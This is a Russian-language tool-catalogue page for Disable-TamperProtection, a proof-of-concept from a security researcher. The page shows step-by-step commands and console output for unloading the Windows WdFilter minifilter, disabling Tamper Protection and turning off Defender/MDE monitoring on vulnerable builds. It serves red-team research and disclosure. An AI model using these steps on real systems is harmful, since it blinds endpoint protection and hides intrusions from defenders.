Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Disable-TamperProtection — A POC to disable TamperProtection and other Defender / MDE components | Kitploit
Инструменты/GitHubGitHub/alteredsecurity/disable-tamperprotection
Post-ExploitationPenetration TestingRed TeamingAdversarial Attack
GitHubalteredsecurity/disable-tamperprotection

Disable-TamperProtection

A POC to disable TamperProtection and other Defender / MDE components

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
258402 лет назадПроверено Kitploit

Отключение Tamper Protection и других компонентов Defender / MDE

Можно злоупотребить привилегиями SYSTEM / TrustedInstaller, чтобы изменить или удалить настройки WdFilter (regkey ALTITUDE) и выгрузить kernel minidriver, отключив Tamper Protection и другие компоненты Defender. Это также затрагивает Microsoft Defender for Endpoint (MDE), ослепляя MDE и скрывая телеметрию и активность, выполняемую на целевой системе.

В ходе тестирования было обнаружено, что эта уязвимость затрагивает следующие версии Windows:

  • Windows Server 2022 до BuildLabEx Version: 20348.1.amd64fre.fe_release.210507-1500 (апрельское обновление 2024 г.)
  • Windows Server 2019
  • Windows 10 до BuildLabEx Version: 19041.1.amd64fre.vb_release.191206-1406 (апрельское обновление 2024 г.)
  • Windows 11 до BuildLabEx Version: 22621.1.amd64fre.ni_release.220506-1250 (сентябрьское обновление 2023 г.).

Блог, объясняющий обход и POC: https://www.alteredsecurity.com/post/disabling-tamper-protection-and-other-defender-mde-components

Использование

ПРИМЕЧАНИЕ: VC_redist.x64.exe (MSVC runtime) может потребоваться установить на целевой системе.

POC Demo: https://youtu.be/MI6aVDHRix8

POC работает в 3 шага (требуются права администратора):

root@kitploit:~
C:\> .\Disable-TamperProtection.exe
Sequential Usage: 1 --> 2 --> 3
1:      Unload WdFilter
2:      Disable Tamper Protection
3:      Disable AV/MDE
4:      Restore AV/MDE settings

Пример использования POC выглядит следующим образом:

  1. Выгрузить WdFilter:
root@kitploit:~
C:\> .\Disable-TamperProtection.exe 1
[+] WdFilter Altitude Registry key Value: 328010
[+] Trusted Installer handle: 0000000000000120
[!] Spawning registry with TrustedInstaller privileges to delete WdFilter "Altitude" regkey.
[+] Created process ID: 3744 and assigned additional token privileges.
[+] Execute option 1 to validate!

# Upon 2nd execution if the above output repeats the target isn't vulnerable
C:\> .\Disable-TamperProtection.exe 1
[+] WdFilter Altitude Registry key has been successfully deleted.
[+] Enumerating WdFilter information:
        Next:   0 | Frame ID:   0 | No. of Instances:   4 | Name:        wdfilter | Altitude:          328010
[+] Restart the system or wait a few minutes for WdFilter to unload.
[+] Execute option 1 to validate!

# Restart to crash and unload WdFilter
C:\> .\Disable-TamperProtection.exe 1
[+] WdFilter Altitude Registry key has been successfully deleted.
[+] WDFilter has been successfully unloaded, use option 2 to disable Tamper Protection.
  1. Отключить Tamper Protection:
root@kitploit:~
C:\> .\Disable-TamperProtection.exe 2
[+] WdFilter Altitude Registry key has been successfully deleted.
[+] Trusted Installer handle: 00000000000000C4
[!] Spawning registry with TrustedInstaller privileges to alter Defender "TamperProtection" regkey from 5 to 4.
[+] Created process ID: 7748 and assigned additional token privileges.
[+] Use option '3' to finally Disable AV/MDE.
  1. Отключить компоненты Defender / MDE:
root@kitploit:~
C:\> .\Disable-TamperProtection.exe 3
[+] WdFilter Altitude Registry key has been successfully deleted.
[+] Trusted Installer handle: 000000000000011C
[!] Spawning registry with TrustedInstaller privileges to Disable 'RealtimeMonitoring' regkey.
[+] To disable other components of defender check source.
[+] Created process ID: 8040 and assigned additional token privileges.
  1. Восстановить WdFilter minidriver, TamperProtection и параметры Defender (в реальном времени). Убедитесь, что номер Altitude (по умолчанию: 328010) изменён обратно на исходное значение в строке 530 в POC.
root@kitploit:~
# Restart the computer after execution to restore settings successfully
C:\> .\Disable-TamperProtection.exe 4
[+] WdFilter Altitude Registry key has been successfully deleted.
[+] Make sure to change Altitude in Source (Default: 328010) and reboot computer after execution.
[+] Trusted Installer handle: 0000000000000120
[!] Spawning registry with TrustedInstaller privileges to Enable 'RealtimeMonitoring' regkey.
[+] Created process ID: 5852 and assigned additional token privileges.
[!] Spawning registry with TrustedInstaller privileges to Enable 'TamperProtection' regkey.
[+] Created process ID: 2744 and assigned additional token privileges.
[!] Spawning registry with TrustedInstaller privileges to restore WdFilter "Altitude" regkey.
[+] Created process ID: 7044 and assigned additional token privileges.

Ссылки

  • Группы порядка загрузки и altitudes для драйверов-минифильтров от Microsoft
  • NSudo
  • superUser
  • Исследовательская работа по ослеплению Defender
  • MDE Internals (внутреннее устройство) от FalconForce

Авторы

Автор: Munaf Shariff (@m3rcer)

Исследователь безопасности в Altered Security

Скачать инструмент